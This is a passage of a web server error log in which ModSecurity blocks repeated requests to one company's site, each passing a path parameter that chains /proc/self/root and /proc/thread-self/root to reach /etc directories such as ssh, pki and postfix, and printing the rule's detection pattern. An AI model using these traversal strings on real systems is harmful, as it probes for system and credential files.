"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD96BJNF7axNlVR0X5swAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:20.611395 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.241.46:55156] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD-NCmCSWTlPouqorH4gAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:21.933526 2026] [:error] [pid 2305:tid 140411658000128] [client 74.7.241.46:55166] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD-QQohV2v-7oj5HH3lAAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:23.158808 2026] [:error] [pid 11469:tid 140411725141760] [client 74.7.241.46:55168] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD-5DEJR9VXonE_-1LPAAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:24.475153 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.241.46:55184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD_AeiSKl8TjouI-b_IAAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:25.671094 2026] [:error] [pid 2305:tid 140411741927168] [client 74.7.241.46:55198] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD_QQohV2v-7oj5HH3lwAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:26.999342 2026] [:error] [pid 7000:tid 140411632822016] [client 74.7.241.46:55208] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD_hePVOt35XCGZP8sWQAAA40"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:28.179574 2026] [:error] [pid 1210:tid 140411674785536] [client 74.7.241.46:51732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEAFKJy4A1bGlmj9BSUAAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:30.035381 2026] [:error] [pid 1961:tid 140411616036608] [client 74.7.241.46:51740] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEAXRXaaWotPICgYsiOgAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:31.451157 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.46:51746] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEA6BJNF7axNlVR0X5uQAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:32.955085 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.46:51756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEBKBJNF7axNlVR0X5vwAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:34.574154 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.46:51758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEBqBJNF7axNlVR0X5wAAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:35.281884 2026] [:error] [pid 11469:tid 140411733534464] [client 74.7.243.203:46782] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEB5DEJR9VXonE_-1LTQAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:35.833882 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.46:51772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEB6BJNF7axNlVR0X5xQAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:38.083895 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.46:51782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablECaBJNF7axNlVR0X5xwAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:39.503287 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.241.46:37394] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEC6BJNF7axNlVR0X5yQAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:40.873856 2026] [:error] [pid 2305:tid 140411574073088] [client 74.7.241.46:37398] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEDAQohV2v-7oj5HH3nwAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:42.017836 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.46:37402] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEDgeiSKl8TjouI-b_KwAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:43.360697 2026] [:error] [pid 1961:tid 140411649607424] [client 74.7.241.46:37404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablED3RXaaWotPICgYsiPwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:44.735814 2026] [:error] [pid 1210:tid 140411548894976] [client 74.7.241.46:37408] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEEFKJy4A1bGlmj9BSVQAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:45.887441 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.46:37412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEEaBJNF7axNlVR0X50AAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:47.227190 2026] [:error] [pid 11469:tid 140411649607424] [client 74.7.241.46:37424] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEE5DEJR9VXonE_-1LTwAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
